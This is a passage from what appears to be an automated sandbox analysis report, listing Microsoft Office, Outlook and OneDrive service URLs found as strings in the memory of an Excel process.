Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ncus.contentsync.
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com$
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com4u
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com7
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comB
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comRuU
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comV
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comX
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comYh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comj
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.coms.dll7
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.coms.dll9
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.coms.dllh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comt
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com~
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://officesetup.getmicrosoftkey.com&
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp String found in binary or memory: https://omex.cdn.office.net/addinclassifie
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities.dllNt
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://onedrive.live.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseQ
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/embed?iom/
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://osi.office.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.net(
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netN
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office.com/
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.956514368.000000001340C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965853409.0000000013410000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
